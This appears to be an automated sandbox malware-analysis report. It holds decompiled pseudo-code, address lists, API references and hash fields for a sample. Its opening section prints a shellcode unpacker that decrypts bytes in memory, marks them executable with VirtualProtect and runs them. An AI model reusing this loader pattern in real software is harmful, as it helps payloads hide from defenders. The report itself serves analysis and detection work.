						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000005 | ( *0x6edc7f28 & 0x000000ff) << 0x00000003;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000001f;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000002 | ( *0x6edc7f28 & 0x000000ff) << 0x00000006;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x5a;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000007a;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x98;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000021;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x76;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000008b;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xef;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xcf;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000006 | ( *0x6edc7f28 & 0x000000ff) << 0x00000002;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000086;
						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000001 | ( *0x6edc7f28 & 0x000000ff) << 0x00000007;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000007 | ( *0x6edc7f28 & 0x000000ff) << 0x00000001;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x000000bb;
						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x24;
						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
						_t76 =  *0x6edc72a0; // 0x12ec
						_t108 =  *0x6edc7f28; // 0x0
						 *((char*)( &E6EDC2000 + _t76)) = _t108;
						continue;
					}
					L3:
					VirtualProtect( &E6EDC2000, 0x12ec, 0x40, 0x6edc7f24);
					E6EDC2000(); // executed
					L4:
					return 0;
					L5:
				}
			}







                                                                                                0x6edaf5af
                                                                                                0x6edaf5af
                                                                                                0x6edaf5af
                                                                                                0x6edaf5af
                                                                                                0x6edaf5b8
                                                                                                0x6edaf5be
                                                                                                0x6edaf5c8
                                                                                                0x6edaf5ce
                                                                                                0x6edaf5ce
                                                                                                0x6edaf5d4
                                                                                                0x6edaf5da
                                                                                                0x6edaf5e9
                                                                                                0x6edaf5fc
                                                                                                0x6edaf618
                                                                                                0x6edaf626
                                                                                                0x6edaf639
                                                                                                0x6edaf647
                                                                                                0x6edaf65a
                                                                                                0x6edaf66a
                                                                                                0x6edaf685
                                                                                                0x6edaf698
                                                                                                0x6edaf6a7
                                                                                                0x6edaf6b7
                                                                                                0x6edaf6ca
                                                                                                0x6edaf6d8
                                                                                                0x6edaf6eb
                                                                                                0x6edaf6fa
                                                                                                0x6edaf709
                                                                                                0x6edaf719
                                                                                                0x6edaf72b
                                                                                                0x6edaf73d
                                                                                                0x6edaf74c
                                                                                                0x6edaf75e
                                                                                                0x6edaf779
                                                                                                0x6edaf788
                                                                                                0x6edaf79a
                                                                                                0x6edaf7a9
                                                                                                0x6edaf7b8
                                                                                                0x6edaf7d2
                                                                                                0x6edaf7e5
                                                                                                0x6edaf7ff
                                                                                                0x6edaf812
                                                                                                0x6edaf824
                                                                                                0x6edaf837
                                                                                                0x6edaf846
                                                                                                0x6edaf858
                                                                                                0x6edaf86b
                                                                                                0x6edaf87e
                                                                                                0x6edaf890
                                                                                                0x6edaf8a0
                                                                                                0x6edaf8b3
                                                                                                0x6edaf8b8
                                                                                                0x6edaf8be
                                                                                                0x6edaf8c4
                                                                                                0x00000000
                                                                                                0x6edaf8c4
                                                                                                0x6edaf8cf
                                                                                                0x6edaf8e0
                                                                                                0x6edaf8e8
                                                                                                0x6edaf8ec
                                                                                                0x6edaf8ef
                                                                                                0x00000000
                                                                                                0x6edaf8ef

                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(6EDC2000,000012EC,00000040,6EDC7F24), ref: 6EDAF8E0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 79976b1f633c92c105ed0e6b81da70af1546f981dbee7c86d21341ae2588e427
                                                                                                • Instruction ID: f4d3af6bc11f5e3559fb0bb2523c0fd667be671a425c5e0cccfd5d8708494a32
                                                                                                • Opcode Fuzzy Hash: 79976b1f633c92c105ed0e6b81da70af1546f981dbee7c86d21341ae2588e427
                                                                                                • Instruction Fuzzy Hash: 53719F5400DEEABDFB17877B80EC0607FAD5A6FAF2368418AE0D2462C7D55842C7DB25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC2616, Relevance: .1, Instructions: 61COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                                                • Instruction ID: 6152edbcd6ca2414d65425bf186d9e8e0935443dcc4992d34c08b54073b67435
                                                                                                • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                                                • Instruction Fuzzy Hash: 2811A071A10509EFDB10DBEAD8888AAF7FDEF45AD8B5140A5E805D3314E770DE41C661
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC2706, Relevance: .0, Instructions: 26COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                                                • Instruction ID: d352678444a10e58c5ade5a58d6ddb273e30cf2dad167346ef2445e3c6b11d94
                                                                                                • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                                                • Instruction Fuzzy Hash: F5E09A35760A09DFCB48CBA8C881D55B3F8EB09B64B104290F825C73E0EB34EE40DA51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC2744, Relevance: .0, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                                • Instruction ID: c2c03cc29f3d865c87e5c36ec8baef29063463ef69ebf91c1b91804c30e62f78
                                                                                                • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                                • Instruction Fuzzy Hash: 5BE04F363109108BC351DB9985C0842F3EDFB88AF47155869E899D3654C620FC418A61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC26C7, Relevance: .0, Instructions: 7COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA29D0, Relevance: 63.5, APIs: 14, Strings: 22, Instructions: 472memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA2A3B
                                                                                                • NdrAllocate.RPCRT4(?,00000001), ref: 6EDA2ACC
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2B10
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2B6A
                                                                                                • NdrAllocate.RPCRT4(?,00000001), ref: 6EDA2BFE
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2C42
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2C9C
                                                                                                • NdrAllocate.RPCRT4(?,00000002), ref: 6EDA2D30
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2D74
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2DCE
                                                                                                • NdrAllocate.RPCRT4(?,00000002), ref: 6EDA2E64
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2EA8
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2F02
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA32EC
                                                                                                Strings
                                                                                                • *ppMemory: %p, xrefs: 6EDA2B7D
                                                                                                • *ppMemory: %p, xrefs: 6EDA2DE1
                                                                                                • false, xrefs: 6EDA29ED, 6EDA29F7
                                                                                                • value: 0x%02x, xrefs: 6EDA2BB9
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA2C8A
                                                                                                • invalid range base type: 0x%02x, xrefs: 6EDA32DA
                                                                                                • value exceeded bounds: %d, low: %d, high: %d, xrefs: 6EDA2B58
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA2DBC
                                                                                                • pStubMsg: %p, ppMemory: %p, type: 0x%02x, fMustAlloc: %s, xrefs: 6EDA2A07
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2D62
                                                                                                • *ppMemory: %p, xrefs: 6EDA2CAF
                                                                                                • *ppMemory: %p, xrefs: 6EDA2F15
                                                                                                • value exceeded bounds: %d, low: %d, high: %d, xrefs: 6EDA2EF0
                                                                                                • invalid format type %x, xrefs: 6EDA2A29
                                                                                                • true, xrefs: 6EDA29E4
                                                                                                • value: 0x%02x, xrefs: 6EDA2CEB
                                                                                                • value: 0x%04x, xrefs: 6EDA2F53
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2E96
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2C30
                                                                                                • value: 0x%04x, xrefs: 6EDA2E1F
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2AFE
                                                                                                • base_type = 0x%02x, low_value = %d, high_value = %d, xrefs: 6EDA2A68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$base_type = 0x%02x, low_value = %d, high_value = %d$buffer overflow - Buffer = %p, BufferEnd = %p$buffer overflow - Buffer = %p, BufferEnd = %p$buffer overflow - Buffer = %p, BufferEnd = %p$buffer overflow - Buffer = %p, BufferEnd = %p$false$invalid format type %x$invalid range base type: 0x%02x$pStubMsg: %p, ppMemory: %p, type: 0x%02x, fMustAlloc: %s$true$value exceeded bounds: %d, low: %d, high: %d$value exceeded bounds: %d, low: %d, high: %d$value exceeded bounds: %u, low: %u, high: %u$value exceeded bounds: %u, low: %u, high: %u$value: 0x%02x$value: 0x%02x$value: 0x%04x$value: 0x%04x
                                                                                                • API String ID: 3870461605-2685303744
                                                                                                • Opcode ID: 8872a3e2644a9651149551d300bf2ef1ed691ccf4f6218496aa90d266da21aa2
                                                                                                • Instruction ID: 7c7ccea5a5cf414ba1ab2047e9b42dcb2973ac554e7b284cd1080a582ac029ac
                                                                                                • Opcode Fuzzy Hash: 8872a3e2644a9651149551d300bf2ef1ed691ccf4f6218496aa90d266da21aa2
                                                                                                • Instruction Fuzzy Hash: B5126E74604145EFDB04CF99C490A6ABBB6EF89355F14C188FD898F386D331EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA77F0, Relevance: 49.4, APIs: 6, Strings: 22, Instructions: 439memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000001), ref: 6EDA78C6
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000002), ref: 6EDA7983
                                                                                                  • Part of subcall function 6EDAAF00: RpcRaiseException.RPCRT4(000006F7,?,6EDA108D,?,00000004), ref: 6EDAAF34
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000004), ref: 6EDA7A40
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000004), ref: 6EDA7AFC
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000008), ref: 6EDA7BC1
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000008), ref: 6EDA7C86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate$ExceptionRaise
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$Unhandled base type: 0x%02x$false$pStubMsg: %p, ppMemory: %p, type: 0x%02x, fMustAlloc: %s$true$value: %f$value: %f$value: %s$value: 0x%02x$value: 0x%04x$value: 0x%08x
                                                                                                • API String ID: 3846748424-3981477881
                                                                                                • Opcode ID: 6e034e2ae1c0d6661c6c815bbd328f9c9124a7321f16113b06afba8c05a719d6
                                                                                                • Instruction ID: e5e178e8c8e24d4d61dfac229698377480c84f0d168372d1989c542ed3af7984
                                                                                                • Opcode Fuzzy Hash: 6e034e2ae1c0d6661c6c815bbd328f9c9124a7321f16113b06afba8c05a719d6
                                                                                                • Instruction Fuzzy Hash: A1F173B4A00104BFDB44CFA8D880A997779AF85749F10C159FE599F389E731EB50CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00403E25, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fb8 =  *0x429fb8 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403D44(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297a8 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004040B0();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e33c; // 0x6055b9
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42eb98; // 0x603dec
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403DF1;
				E00403CDD(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403CDD(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403D12(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42eb70; // 0x5ff628
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428f9c =  *0x428f9c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fb8 =  *0x429fb8 & 0x00000000;
				return 0;
			}




















                                                                                                0x00403e35
                                                                                                0x00403f5b
                                                                                                0x00403fb7
                                                                                                0x00403fbb
                                                                                                0x00404092
                                                                                                0x00404094
                                                                                                0x00404094
                                                                                                0x0040409a
                                                                                                0x0040409a
                                                                                                0x0040409d
                                                                                                0x00000000
                                                                                                0x004040a4
                                                                                                0x00403fc9
                                                                                                0x00403fcb
                                                                                                0x00403fd5
                                                                                                0x00403fe0
                                                                                                0x00403fe3
                                                                                                0x00403fe6
                                                                                                0x00403ff1
                                                                                                0x00403ff4
                                                                                                0x00403ffb
                                                                                                0x00404009
                                                                                                0x00404021
                                                                                                0x00404034
                                                                                                0x00404044
                                                                                                0x00404046
                                                                                                0x00404046
                                                                                                0x00403ffb
                                                                                                0x00404050
                                                                                                0x00000000
                                                                                                0x0040405b
                                                                                                0x0040405f
                                                                                                0x00404070
                                                                                                0x00404070
                                                                                                0x00404076
                                                                                                0x00404084
                                                                                                0x00404084
                                                                                                0x00000000
                                                                                                0x00404088
                                                                                                0x00404050
                                                                                                0x00403f66
                                                                                                0x00000000
                                                                                                0x00403f7a
                                                                                                0x00403f80
                                                                                                0x00403f86
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00403fab
                                                                                                0x00403fad
                                                                                                0x00403fb2
                                                                                                0x00000000
                                                                                                0x00403fb2
                                                                                                0x00403f66
                                                                                                0x00403e3b
                                                                                                0x00403e3e
                                                                                                0x00403e43
                                                                                                0x00403e45
                                                                                                0x00403e54
                                                                                                0x00403e54
                                                                                                0x00403e56
                                                                                                0x00403e5b
                                                                                                0x00403e5e
                                                                                                0x00403e60
                                                                                                0x00403e65
                                                                                                0x00403e6e
                                                                                                0x00403e74
                                                                                                0x00403e80
                                                                                                0x00403e83
                                                                                                0x00403e8c
                                                                                                0x00403e91
                                                                                                0x00403e94
                                                                                                0x00403e99
                                                                                                0x00403eb0
                                                                                                0x00403eb7
                                                                                                0x00403eca
                                                                                                0x00403ecd
                                                                                                0x00403ee2
                                                                                                0x00403ee4
                                                                                                0x00403ee9
                                                                                                0x00403eee
                                                                                                0x00403ef3
                                                                                                0x00403ef3
                                                                                                0x00403f02
                                                                                                0x00403f11
                                                                                                0x00403f13
                                                                                                0x00403f29
                                                                                                0x00403f38
                                                                                                0x00403f3a
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403EB0
                                                                                                • GetDlgItem.USER32 ref: 00403EC4
                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                                                                                                • GetSysColor.USER32(?), ref: 00403EF3
                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                                                                                                • lstrlenA.KERNEL32(?), ref: 00403F1B
                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                                                                                                • GetDlgItem.USER32 ref: 00403F9B
                                                                                                • SendMessageA.USER32(00000000), ref: 00403F9E
                                                                                                • GetDlgItem.USER32 ref: 00403FC9
                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                                                                                                • LoadCursorA.USER32 ref: 00404018
                                                                                                • SetCursor.USER32(00000000), ref: 00404021
                                                                                                • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                                                                                                • LoadCursorA.USER32 ref: 00404041
                                                                                                • SetCursor.USER32(00000000), ref: 00404044
                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
